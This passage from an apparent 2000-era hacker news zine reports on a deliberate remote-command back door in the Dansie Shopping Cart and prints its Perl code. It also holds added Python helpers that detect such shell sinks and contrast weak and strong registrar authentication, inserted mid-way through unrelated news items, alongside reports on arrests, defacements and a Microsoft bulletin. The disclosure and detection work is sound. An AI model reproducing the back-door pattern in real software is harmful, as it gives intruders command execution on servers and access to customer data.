      open(ELIF,"|$FORM{'?????????'}");
   }
   exit;
}
---------

The form element '?????????', which was originally a pseudo-random appearing nine digit string of letters and numbers, allows an intruder to execute any command on the server with the same privileges as the CGI process itself.
Although this is a full disclosure list, the trigger element is obscured to prevent the script kiddies from running away with this back door. If you own the cart, then you have access to the source code and can discover the element in question easily enough on your own.

Further searches through the code reveal that this form element is immune to data validation - it gets passed into this code fragment unchallenged.

The '$d' variable of the condition which permits the back door to function is set elsewhere in the program to contain the string 'dansie'. (Again, using the ciphertext algorithm) This indicates that the form element won't work on Dansie's own host, but will work on anyone else's. There are additional problems with the 'there' function but we'll leave them as exercises for the reader to decipher.

Dansie.net, armed with the server name and URL to the CGI executable provided by the cloaked email routine, would be able to run commands on any web server on the Internet that has the Dansie Shopping Cart installed. It takes little imagination to dream up the potential havoc and privacy violations this level of access could result in; from stealing private customer records to a full-blown crack of an E-Commerce server.

When checking to see if this was a known issue, the following post from "Kasey Johns", made a little over a week ago, was discovered in alt.comp.perlcgi.freelance:

http://www.deja.com/getdoc.xp?AN=601644315

Follow-up article:

http://www.deja.com/getdoc.xp?AN=601857849

We won't quote Kasey's posts here, in brief, Kasey also discovered the back door and cloaked email routines. Kasey also provides evidence in the post to indicate that not only is Dansie well aware of the back door routine, but may be actively attempting to utilize it.

Based upon our own investigation, the information Kasey posted, and our own firewall logs (see below), it is our opinion that the back door within Dansie.net's shopping cart can best be summarized as follows:

1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.

* Based upon the log snippet in Kasey's post showing attempted access to the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to Kasey, access to the CGI was attempted less than 30 minutes after the cart was installed.

When we noticed the attempted usage of Kasey's server, a quick check of our own firewall logs revealed the following:

Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}

We can only assume these attempts, made from the same /24 on Earthlink's dial-ups as the one used to probe Kasey's server, were from the author of the shopping cart.

We will not try to hazard a guess as to why Dansie.net felt the need to include a back door within their shopping cart software. Whatever their reasoning may be, it is our opinion that no reason, no matter how well thought out or rationalized, justifies the existence of this back door. No reasoning can possibly explain away a routine that deliberately allows an intruder unrestricted and unauthorized access to any server on the Internet that has the Dansie Shopping Cart installed.

--
Joe
Technical Support
General Support: support@blarg.net
Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG
http://www.blarg.net

@HWA

61.0 [HNN] MostHateD Pleads Guilty
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by Cacopalyse

MosthateD (Patrick W. Gregory) a member of the online group Global Hell (gH) has pleaded guilty to a single count of conspiracy to commit telecommunications wire fraud in Texas US District Court. He could receive up to five years in prison and a $250,000 fine. MostHateD was among those snared during the wave of FBI raids immediately following the defacement of the White House web page.
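An added example, not part of the BugTraq post in item 60.0 above and not Dansie or Blarg code: a small Python audit helper that replays the fixed substitution table from the quoted 'there2' subroutine to decode hidden string literals, and flags Perl lines where form input reaches system() or a piped open(). SAMPLE_PERL is a constructed excerpt assembled from the fragments quoted in the post, with the trigger element left masked as it is there; every name other than there2 is this example's own.

```python
import re

# Substitution table copied from the there2 subroutine quoted in the advisory:
#   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr/_/-/; tr/\@/\./;
# The three tr steps never feed each other, so one combined table is equivalent.
SRC = "abcdefghijklmnopqrstuvwxyz0123456789"
DST = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth"
THERE2_TABLE = str.maketrans(SRC + "_@", DST + "-.")

# A there2() call whose argument is a plain quoted literal (no $ or @ interpolation).
CALL_RE = re.compile(r"""&?there2\(\s*(['"])([^'"$@]*)\1\s*\)""")

# Places where a CGI form field is handed to a shell.
SINKS = [
    ("system/exec on form input",
     re.compile(r"\b(?:system|exec)\s*\([^)]*\$FORM\{")),
    ("piped open on form input",
     re.compile(r'\bopen\s*\(\s*\w+\s*,\s*"\|[^"]*\$FORM\{')),
]

# Constructed sample: fragments quoted in the advisory, trigger still masked.
SAMPLE_PERL = r'''
sub there3 {
  $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
  $b = &there2('8v59_3jhhzi8');
  $c = &there2("@there2");
  open (TECH, "|$mailprog $a");
}
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) ||
     ( ($FORM{'?????????'} ) && (!$d) ) ) {
  if ( $ENV{'OS'} ) { system("$FORM{'?????????'}"); }
  else { open(ELIF,"|$FORM{'?????????'}"); }
  exit;
}
'''


def there2(text):
    """Python equivalent of the cart's there2(): apply the fixed table."""
    return text.translate(THERE2_TABLE)


def decode_hidden_strings(perl_source):
    """Return (ciphertext, plaintext) for every literal passed to there2()."""
    return [(m.group(2), there2(m.group(2)))
            for m in CALL_RE.finditer(perl_source)]


def find_command_sinks(perl_source):
    """Return (line number, finding, source line) where $FORM reaches a shell."""
    hits = []
    for lineno, line in enumerate(perl_source.splitlines(), start=1):
        for label, pattern in SINKS:
            if pattern.search(line):
                hits.append((lineno, label, line.strip()))
    return hits


if __name__ == "__main__":
    print("Strings hidden behind there2():")
    for cipher, plain in decode_hidden_strings(SAMPLE_PERL):
        print(f"  {cipher!r:16} -> {plain!r}")
    print("Form input reaching a shell:")
    for lineno, label, line in find_command_sinks(SAMPLE_PERL):
        print(f"  line {lineno}: {label}: {line}")
```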
Mindphaser (Chad Davis), who was snagged during the same set of raids, pleaded guilty to similar charges earlier this year in Green Bay Wisconsin.

NewsBytes
http://www.newsbytes.com/pubNews/00/147420.html

Pay to play pocket book ream site - sorry no story - Ed

@HWA

62.0 [HNN] NSA And CIA Deny Echelon is Used Domestically
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by root66

CIA Director George Tenet and NSA director Lt. Gen. Michael V. Hayden staunchly denied allegations that either agency conducts electronic surveillance on US citizens. The denials were in front of the US House intelligence committee. After the hearing, Chairman Porter Goss, R-Fla. said he was satisfied that "our safeguards are in place and are working."

Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/037020.htm

Dead Url

@HWA

63.0 [HNN] Keyboard Monitoring Becoming More Popular with Business
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by root66

While keystroke monitoring software has been around for decades it has recently become extremely popular in the corporate setting. With the courts consistently siding with the employers on electronic monitoring of employees and the low cost and availability of keystroke recording software (This article says $99 but there are a lot of free ones.) businesses are starting to snoop on their employees more and more.
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/085400.htm

Dead Url

@HWA

64.0 [HNN] Japanese Cult Wrote Software for Navy
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by root66

HNN has reported on this before but another story has popped up regarding the Japanese cult Aum Shinri Kyo (Supreme Truth), which was involved with releasing nerve gas in a Japanese subway killing 12 people, and their involvement with developing software for the Maritime Self Defense Force, or navy, including the whereabouts of submarines. (Japan has submarines?)

Reuters - via The San Jose Mercury News
http://www.mercurycenter.com/breaking/docs/081626.htm

Dead Url

@HWA

65.0 [HNN] MPAA Suspects Denial of Service Attack
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by Cruciphux

Yesterday HNN reported a rumor that the MPAA was under a denial of service attack. Today MSNBC has received confirmation that administrators of the site suspect that their current problems are related to some sort of DoS attack. The attack is believed to be in retaliation for the MPAA action regarding the DeCSS software.

MSNBC
http://www.msnbc.com/news/394566.asp?0m

Dead Url

@HWA

66.0 [HNN] Even More E-zines
     ~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by Slider_100

Oblivion Mag is the latest UK underground e-zine for hackers, phreakers and vXers! issue #2 has just been released with the first published interview with Curador. Also L33tdawg from Hack In The Box has announced the availability of Issue #4.

Oblivion Mag
http://www.oblivion-mag.org.uk

Hack In the Box
http://www.hackinthebox.org

@HWA

67.0 [HNN] BackDoor Now Called a Bug
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 17th

contributed by danders

dvwssr.dll, part of Microsoft server software with Front Page extensions was revealed last Friday to have a backdoor password within it that could allow malicious users access to the server.
After originally acknowledging the problem last Friday Microsoft is now claiming that it is nothing more than a bug. (Regardless of whether this is a backdoor or a bug the fact that such items are present in release versions of the code forces the user to question the completeness of Microsoft's quality assurance.)

MSNBC
Microsoft
NT Bug Traq
http://www.msnbc.com/news/394810.asp
http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
http://www.ntbugtraq.com/default.asp?pid

Microsoft Security Bulletin (MS00-025)

Procedure Available to Eliminate "Link View Server-Side Component" Vulnerability

Originally Posted: April 14, 2000
Updated: April 17, 2000

Summary

On April 14, 2000, Microsoft issued the original version of this bulletin, to discuss a security vulnerability affecting several web server products. Shortly after publishing the bulletin, we learned of a new, separate vulnerability that increased the threat to users of these products. We updated the bulletin later on April 14, 2000, to advise customers of the new vulnerability, and noted that we would provide additional details when known. On April 17, 2000, we updated the bulletin again to provide those details.

A procedure is available to eliminate a security vulnerability that could allow a malicious user to cause a web server to crash, or potentially run arbitrary code on the server, if certain permissions have been changed from their default settings to inappropriate ones.

Although this bulletin has been updated several times as the investigation of this issue has progressed, the remediation steps have always remained the same – customers running affected web servers should delete the affected file, Dvwssr.dll. Customers who have done this at any point in the past do not need to take any further action.
Frequently asked questions regarding this vulnerability and the procedure can be found at http://www.microsoft.com/technet/security/bulletin/fq00-025.asp

Issue

Dvwssr.dll is a server-side component used to support the Link View feature in Visual Interdev 1.0. However, it contains an unchecked buffer. If overrun with random data, it could be used to cause an affected server to crash, or could allow arbitrary code to run on the server in a System context.

By default, the affected component, Dvwssr.dll, resides in a folder whose permissions only allow web authors to execute it. Under these conditions, only a person with web author privileges could exploit the vulnerability – but a web author already has the ability to upload and execute code of his choice, so this case represents little additional threat. However, if the permissions on the folder were set inappropriately, or the .dll were copied to a folder with lower permissions, it could be possible for other users to execute the component and exploit the vulnerability.

Affected Software Versions

The affected component is part of Visual Interdev 1.0. However, it is a server-side component, and is included in the following products:

* Microsoft® Windows NT® 4.0 Option Pack, which is the primary distribution mechanism for Internet Information Server 4.0
* Personal Web Server 4.0, which ships as part of Windows® 95 and 98
* Front Page 98 Server Extensions, which ships as part of Front Page 98.

NOTE:

* Windows 2000 is not affected by this vulnerability. Upgrading from an affected Windows NT 4.0 to Windows 2000 removes the vulnerability.
* Installing Office 2000 Server Extensions on an affected server removes this vulnerability.
* Installing FrontPage 2000 Server Extensions on an affected server removes this vulnerability.

Remediation

To eliminate this vulnerability, customers who are hosting web sites using any of the affected products should delete all copies of the file Dvwssr.dll from their servers.
The FAQ provides step-by-step instructions for doing this. The only functionality lost by deleting the file is the ability to generate link views of .asp pages using Visual Interdev 1.0.

More Information

Please see the following references for more information related to this issue.

* Frequently Asked Questions: Microsoft Security Bulletin MS00-025
* Microsoft Knowledge Base article Q259799 discusses this issue and will be available soon.
* Microsoft TechNet Security web site

Obtaining Support on this Issue

Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp.

Revisions

* April 14, 2000: Bulletin Created.
* April 14, 2000: Bulletin updated to provide preliminary results of investigation of buffer overrun vulnerability
* April 17, 2000: Bulletin updated to provide final results of investigation.

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

Last updated April 17, 2000
© 2000 Microsoft Corporation. All rights reserved.

@HWA

68.0 [HNN] North Carolina Plagued by 'hackers'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Evilution
The FBI has warned that North Carolina is infested with 'hackers' and that business leaders should be concerned.
Doris Gardner from the Charlotte office of the FBI said that several machines within North Carolina had been used in the recent massive DDoS attacks and that such attacks had been launched against North Carolina business. She refused to give further details citing the ongoing investigation but promised a wave of prosecutions soon. (Just what we need, the FBI running around claiming the sky is falling.)

The Charlotte Observer
ABC News
http://www.charlotte.com/observer/natwor/docs/cyberterror0414.htm
http://abcnews.go.com/sections/tech/DailyNews/nchack000414.html

State Target
North Carolina Businesses Target of Net Hackers
The Associated Press

CHAPEL HILL, N.C., April 14 — The FBI is investigating computer hacking in North Carolina. FBI agents warn that Internet hackers have targeted several North Carolina businesses in recent months. They say several computer systems in the state have been used by hackers to attack businesses. Investigators spoke Thursday at the annual forum of the North Carolina Electronics and Information Technologies Association. They urged private businesses to cooperate in stopping hackers who are wreaking millions of dollars in damage. This summer, the FBI plans to form a task force with businesses to share information and alerts about hacking attempts. The FBI will also survey North Carolina businesses to see how many have been the victims of cyber-attacks.

@HWA

69.0 [HNN] Web Sites Redirected, Serbians Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Alex
The Network Solutions registration database has been compromised again this time by people concerned over the crisis in Kosovo.
Adidas, Pfizer, Metro Goldwyn Mayer and LucasArts Entertainments and many others all had their DNS rerouted to point to a page that said 'Kosovo Is Serbia' BBC ABC News Wired WebDNS http://news.bbc.co.uk/hi/english/world/europe/newsid_712000/712211.stm http://www.abcnews.go.com/sections/world/DailyNews/hackers000414.html http://www.wired.com/news/politics/0,1283,35674,00.html http://www.webdns.com/news/item1.html Friday, 14 April, 2000, 01:24 GMT 02:24 UK 'Serb hackers' on the rampage More than 50 websites have been taken over by what is suspected to be a group of Serb hackers. The websites - which included such high-profile names as Manchester United and Adidas - were stripped of their content, and branded with the image of a double-headed eagle, with the words "Kosovo is Serbia". A screen grab from eunet.com's hacked site Many of the sites were Yugoslav, Bosnian and Croatian. The Kosovo Albanian newspaper Koha Ditore and the Albanian site Kosovapress were also among those hacked. In another development, the website of the Serbian Ministry of Information reported that it and other Yugoslav sites had been taken over. It said "American-Albanian propagandists" had forged the entire English version of its site on Wednesday. "In a planned and malicious action, regularly registered Yugoslav sites were taken over on the central server of an American firm involved in the registration of the internet domains," it added. "Numerous sites of the Yugoslav providers, political parties and firms were attacked in a synchronised manner," it said. Chance discovery Most of the companies in the "Kosovo is Serbia" attack have since reclaimed their websites. Manchester United believes the culprits were "cyber-squatters", who register internet sites in the names of celebrities or well-known companies, and then try to sell them back again. An internet company which monitors domain names, WebDNS, spotted that the hacking was part of a sustained campaign. 
Alex Jeffreys, the technical director of WebDNS, said he noticed that several high-profile web-sites were being hacked on Monday. "I almost stumbled over it by chance, when I noticed that a number of large company domain names had changed ownership," he told News Online. As he began checking details of some of the thousands of websites being supported by the server Webprovider Inc, he discovered more than 50 sites that had been hacked from the same address. Hacked websites viagra.com eunet.com winston.com jamesbond.com indianajones.com mafia.com kosova.com yu.com slovenia.com bosnia.com sarajevo.com warcrimesmonitor.com arkan.com tudjman.com The hacked websites had all been registered with Network Solutions, the world's largest register. Mr Jeffreys said it appeared that the hackers had changed the contact details in Network Solutions' database on Sunday night. The contact addresses were at first transferred to a Yugoslav address, and then on Monday night to an Albanian address. "It seems that the Network Solutions database is quite open for hacking, rather than it being one company in particular," he said. How the hackers worked It is impossible to say exactly who the hackers are, or how they managed to breach databases that should be secure. However, Mr Jeffreys said they probably sent spoof e-mails to Network Solutions, pretending to be from the company concerned, and requesting a change of address. The requests for a modification are sent by an automatic e-mail form. Although Network Solutions was not available for comment, a message on their answer machine said that "if you are making a registrar name change or contact modifications request" there would be delays while they "carefully review your request for change". ABC NEWS; Hack Attack Security Glitch Turns Major Web Sites Into Kosovo Billboards Hackers got into more than 50 Web sites in what appeared to be a coordinated effort to promote Serbs in Kosovo. 
This is what slovenia.com looked like after the cyber attack. (slovenia.com) By Andrew Chang April 14 — This week, the tensions in Kosovo reached around the world, into innumerable desktops — thanks to a group of hackers. Hackers got into more than 50 Web sites — including those of some high-profile names, like addidas.com, mgm.com and viagra.com — in what appeared to be a coordinated effort to promote Serbs in Kosovo. The sites were stripped of their content, and branded with an image of a two-headed eagle with the words, “Kosovo is Serbia.” The two-headed eagle is a common image in southeastern Europe. It is used by Bosnian Serbs, as well as Albanians, the former Kosovo Liberation Army, and Russians. One London newspaper report said the hackers had hit up to 2,000 Web sites. Among the other sites that were hacked were indianajones.com and jamesbond.com. Many of the targets were from the Balkans. The Kosovo Albanian newspaper Koha Ditore and the Albanian site Kosovoapress were also among those hacked, the BBC reported. Most of the companies have since reclaimed their Web sites. An Odd Discovery Alex Jeffreys, technical director for WebDNS, a London-based Web security and registration firm, says he first noticed the hacking on Monday, when he noticed a large number of domains had changed ownership. Jeffreys told ABCNEWS.com he was scanning a public directory of domain names when he noticed many of them had moved the domain name contacts away from their rightful owners to a Hotmail e-mail address. It is unusual for established companies to move their contact e-mail address to a free e-mail service like Hotmail, Jeffreys said. Signing up for Hotmail is almost anonymous — and brand-name companies usually have e-mail addresses based off their own sites. Network Solutions to Blame? All the hacked Web sites had been registered with Network Solutions, the world’s largest register. 
The hackers managed to breach security by sending spoof e-mails to Network Solutions, pretending to be from the company concerned and requesting a change of address, said a spokesperson for Network Solutions, who declined to be identified. The spokesperson said the chosen Web sites were hacked because they used the most basic level of online security — an automated process where the e-mail address of a user requesting a change of address is only checked against the e-mail address on record of the person authorized to make such a change. By forging their e-mail addresses, the hackers fooled the automation into thinking they were authorized to make a change — and subsequently moved authority for the site to a Hotmail account. The company does offer its users higher levels of security, the Network Solutions spokesperson said. Most of the prominent sites were back to normal today, and made no mention of the hacking. A few, like slovenia.com, still displayed the “Kosovo is Serbia” brand. Others, like eunet.com and yu.com, appeared to have been shut down altogether. Jeffreys hoped the Web sites had learned a valuable lesson about security. “It shouldn’t be that simple to make the change,” he said.

@HWA

70.0 [HNN] Metallica Sues Napster, Gets Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Metallica shows us that they are now as hip as our dads and acting like stuck up suits to prove it, Metallica: you're washed up, too old, your music is limp, and you're old and decrepit. Fuck y'all - Ed.

April 17th
contributed by Evil Wench
Metallica, one of the few groups that owns its own music, has filed suit against Napster and several colleges for copyright infringement. In retaliation Metallica's web site was defaced in protest. This is the second time within the last eight months that the Metallica site has been defaced.
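Added example, not part of the zine or of the articles it reprints, referring back to item 69.0: the Python sketch below contrasts the From:-address check the Network Solutions spokesperson describes with a check that requires a keyed MAC over the request, and flags the move to a free webmail contact that Jeffreys noticed. The registry record, the `X-Request-Auth` header, the HMAC scheme and every `.test` name are assumptions made for illustration, not Network Solutions' actual mechanisms.

```python
import hashlib
import hmac
from email import message_from_string
from email.utils import parseaddr

# Constructed registry record: domain, contact and key are hypothetical.
REGISTRY = {
    "example-corp.test": {
        "contact": "hostmaster@example-corp.test",
        "key": b"secret shared with the contact out of band",
    }
}
# Stand-in for a list of free webmail providers (hypothetical name).
FREE_MAIL = {"freemail.test"}

# Constructed sample request: a contact change toward a webmail address.
CONTACT = "Hostmaster <hostmaster@example-corp.test>"
BODY = "domain: example-corp.test\nnew-contact: example-admin@freemail.test\n"


def sender_address(msg):
    """Address taken from the From: header, which the sender writes freely."""
    return parseaddr(str(msg.get("From", "")))[1].lower()


def weak_authorize(msg, domain):
    """The check the article describes: From: equals the contact on record."""
    rec = REGISTRY.get(domain)
    return rec is not None and sender_address(msg) == rec["contact"]


def request_tag(key, body):
    """HMAC-SHA256 over the request body, hex encoded."""
    return hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()


def strong_authorize(msg, domain):
    """Accept only a request carrying a valid MAC under the contact's key.

    A production scheme would also bind a nonce or timestamp to stop replays.
    """
    rec = REGISTRY.get(domain)
    if rec is None or msg.is_multipart():
        return False
    supplied = str(msg.get("X-Request-Auth", "")).strip()
    expected = request_tag(rec["key"], msg.get_payload())
    return hmac.compare_digest(supplied.encode("utf-8", "replace"),
                               expected.encode("ascii"))


def parse_fields(body):
    """Parse 'name: value' template lines into a dict."""
    fields = {}
    for line in body.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            fields[name.strip().lower()] = value.strip()
    return fields


def review_flags(domain, body):
    """Reasons to hold a contact change for a human to look at."""
    new_contact = parse_fields(body).get("new-contact", "").lower()
    new_domain = new_contact.rpartition("@")[2]
    old_domain = REGISTRY[domain]["contact"].rpartition("@")[2]
    flags = []
    if new_domain != old_domain:
        flags.append("contact leaves the registrant's own mail domain")
    if new_domain in FREE_MAIL:
        flags.append("new contact is at a free webmail provider")
    return flags


def build_request(from_addr, body, key=None):
    """Build a change request; only a key holder can add a valid MAC header."""
    headers = [f"From: {from_addr}", "To: hostmaster@registrar.test",
               "Subject: MODIFY CONTACT"]
    if key is not None:
        headers.append(f"X-Request-Auth: {request_tag(key, body)}")
    return message_from_string("\n".join(headers) + "\n\n" + body)


def demo():
    domain = "example-corp.test"
    forged = build_request(CONTACT, BODY)  # From: line typed by someone else
    signed = build_request(CONTACT, BODY, key=REGISTRY[domain]["key"])
    return {
        "weak_accepts_forged": weak_authorize(forged, domain),
        "strong_accepts_forged": strong_authorize(forged, domain),
        "strong_accepts_signed": strong_authorize(signed, domain),
        "review_flags": review_flags(domain, BODY),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The review flags apply even to a correctly authenticated request, since a stolen key would pass the MAC check but still produce the unusual contact change.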
ZD Net Attrition Mirror #1 Attrition Mirror #2 http://www.zdnet.com/zdnn/stories/news/0,4586,2543398,00.html http://www.attrition.org/mirror/attrition/1999/08/20/www.metallica.com /toprightpart.html http://www.attrition.org/mirror/attrition/2000/04/14/www.metallica.com / ZDNet Metallica's Napster hit: 'Enter Lawman' Rock group sues Napster and several colleges, alleging copyright violation by allowing the illegal swapping of its storied music. Cybervandals retaliate. By Lisa Bowman, ZDNet News UPDATED April 14, 2000 12:32 PM PT The rock group Metallica has sued Napster Inc. and several colleges, claiming, among other things, that they violated copyright law by allowing illegal swapping of its music. E/M Ventures and Creeping Death Music are also plaintiffs in the suit, which was filed in U.S. District Court in the Central District of California and targets the University of Southern California, Yale University and Indiana University. In apparent retaliation Friday, Metallica's Web site was targeted by cybervandals. The unknown hackers left a simple message: "LEAVE NAPSTER ALONE." Aside from two links -- one to Napster and another to the main page of the official Metallica site -- no other message, on the page or in the source code, was posted. This is the first time a music group has gone after Napster, the controversial software that allows people to locate and copy MP3 files. Dozens of colleges have banned its use, claiming it hogged bandwidth and fearing they would be slapped with lawsuits similar to this one. However, in February, USC bucked that trend, saying that it would continue to allow its students to use the technology, which is downloadable from the Internet. San Mateo, Calif.-based Napster already is the target of a suit by the Recording Industry Association of America, which claims that Napster violates the Digital Millennium Copyright Act, a new law that bars devices that could be used to circumvent copyrights. 
The suit says students who use Napster 'exhibit the moral fiber of common looters.' Having Metallica as a plaintiff in this latest case gives the industry even more brand-name backing. The recording industry is worried that digital music files will weaken their power over the sale and distribution of songs, and Napster is one of several new technologies that make it easier for people to swap digital music files. 'Morally and legally wrong' In a press release announcing the suit, publicists for the band and music companies even threw in a statement from Metallica drummer Lars Ulrich, who said it is "sickening to know that our art is being traded like a commodity rather than the art that it is." "From a business standpoint, this is about piracy -- aka taking something that doesn't belong to you -- and that is morally and legally wrong." In the suit, Metallica and the music companies claim that Napster not only violated their copyrights, but also encouraged unlawful use of digital audio devices and enabled the violation of the Racketeering Influenced & Corrupt Organizations Act, or RICO. The suit says that students who use Napster to copy files "exhibit the moral fiber of common looters." Napster officials weren't immediately available for comment. @HWA 71.0 [HNN] Japan To Control PS Exports, Fears Weapon Use ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 17th contributed by Evil Wench Japanese officials have placed severe export restrictions on the new PlayStation2 that prevents Sony from shipping units to the US and other countries. Officials fear that the technology could be used as a weapon. An example given was to use the PS2 image processing capabilities to help control a Tomahawk missile. 
Reuters - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2550857,00.html @HWA 72.0 [HNN] Spy Laptop Goes Missing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by William Knowles A laptop filled with highly secret information was reported missing from a supposedly secure conference room at the State Department's Bureau of Intelligence over a week ago. Officials are unsure at this point if the laptop was stolen or is merely misplaced. (Misplaced?) Associated Press Washington Post http://ap.tbo.com/ap/breaking/MGIVIOBR57C.html defunct url http://www.washingtonpost.com/wp-dyn/articles/A26517-2000Apr16.html Post; State Dept. Computer With Secrets Vanishes By Steven Mufson Washington Post Staff Writer Monday, April 17, 2000; Page A02 A laptop computer containing top-secret information vanished from the State Department's Bureau of Intelligence and Research more than a week ago, and the FBI is investigating whether it was stolen, a senior State Department official said. The laptop's disappearance from a supposedly secure conference room at the department has set off an intense effort to recover the computer and a search for suspects, including contractors who have been renovating the area, the official said. Another person familiar with the incident said that the missing computer contains "code word" information, a classification higher than top secret, and that it includes sensitive intelligence information and plans. The incident is the latest of a string of embarrassing security breaches at the State Department. Last year, counterintelligence officials from the FBI discovered a Russian spy lurking outside the department and later an eavesdropping device planted in a conference room. In 1998, a man dressed in a tweed coat strolled into the executive secretary's office, six doors down from the office of Secretary of State Madeleine K. Albright, helped himself to a sheaf of classified briefing materials in plain view of two secretaries, and walked out. 
The man was never identified and the materials were never recovered. A senior State Department official said that it remained unclear whether the laptop was misplaced or stolen and that, if it was stolen, whether the thief realized the sensitivity of the material it contained or took it simply for the value of the hardware. The senior State Department official added that the laptop's disappearance was not the result of poor security procedures, but rather the failure of State employees to follow those procedures. He said it appeared that some contractors had not been properly escorted when working in the building. "Some policies and procedures were not followed," said the senior official. "It is my very sincere hope that the responsible individual or individuals will be punished." Another person familiar with the incident said that an official had propped open the door of a secure conference room, that contractors lacking security clearances were working in the sensitive area and that the laptop had not been properly secured. The material the laptop contains is classified as "sensitive compartmented information" (SCI), the government's most sensitive intelligence reports. The Bureau of Intelligence and Research (INR) is responsible for handling all top-secret reports at State; information with lower levels of classification is handled by the Office of Diplomatic Security. Last year, INR came under fire from the department's inspector general for lax handling of that material. "The department is substantially not in compliance with the director of central intelligence's directives that govern the handling of SCI," the inspector general, Jacqueline Williams-Bridger, concluded in the report. The CIA also "questioned INR's dedication" to the proper handling of the top-secret material, the State Department official said. The CIA and other agencies believe that the State Department in general fails to attach adequate importance to safeguarding secrets. 
The inspector general recommended transferring responsibility for SCI to State's Office of Diplomatic Security. But a just-completed internal review recommended leaving responsibility for SCI with INR and adding 19 new people to help the bureau better handle the material, the department official said. The inspector general's report and the Russian bugging incident prompted criticism from Congress, which sequestered some funding earmarked for INR and demanded a review of how top-secret information is handled at the department. At a Feb. 7 presentation of State's budget, Albright said she was "continuing to study the possible need for structural changes to ensure that the mandate for the best security is everywhere understood and everywhere applied." The State Department laptop incident follows two intelligence episodes involving stolen laptops in England. A laptop containing sensitive information was stolen from a British army officer at Heathrow Airport. Separately, a laptop containing secret information about Northern Ireland was stolen from an MI5 agent at the Paddington Station of the London Underground. In a third incident, an MI6 officer left his laptop computer containing training information about how to be a spy in a taxi after a night spent drinking at a bar near the agency's London headquarters. MI6 is the British agency responsible for foreign intelligence and foreign spies; MI5 handles internal security matters. The MI6 officer's laptop was recovered after the agency placed a classified ad in a newspaper offering a reward for its return. The MI5 officer's computer has not been found.

© 2000 The Washington Post Company

@HWA

73.0 [HNN] Napster Users May Get Jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by knobdicker
New sentencing guidelines due to take effect in May could land Napster users in jail. Users of Gnutella, Napigator, Wrapster and other programs could also be affected.
The new sentencing guidelines cover intellectual property offenses on an emergency interim basis, and stem from the 1997 No Electronic Theft Act. CNN http://www.cnn.com/2000/TECH/computing/04/14/MP3.crackdown.idg/index.html Swap MP3s, go to jail? From... April 14, 2000 Web posted at: 10:35 a.m. EDT (1435 GMT) by Tom Spring (IDG) -- Pirates. That's all the infuriated music industry sees in Napster, the first online application that lets you download basically any MP3 music without spending a dime. In fact, the Recording Industry Association of America has pushed Napster out on the plank: A San Francisco judge soon will rule on its lawsuit alleging Napster runs a giant haven for music piracy. But the Napster case may be only the opening sword fight. The recording industry is taking very seriously what it considers Internet plundering of its jewels. And new sentencing guidelines scheduled to take effect in May could actually land MP3 pirates in the brig. That is, while simple hobbyist downloads are tough to track, Netizens who violate copyright law by aggressively sharing software and digital tunes face arrest and even jail. Napster is not the only target. Since that suit was filed in December, a fleet of similar applications has sailed onto the Net. Web-based applications such as Gnutella, Napigator, and Wrapster are making it just about impossible to protect music, software programs, photographs, videos, or almost any other copyrighted digital material. The sites promote the programs for legal MP3 trading and often post a policy statement to that effect. In reality, the sites do not police their users (and sometimes note that, as well). The cops know they can't stop everybody, but they aim to get everyone's attention. "There is no way we can arrest a million people," acknowledges Glenn Nick, assistant director of the U.S. Customs Agency's CyberSmuggling Center. 
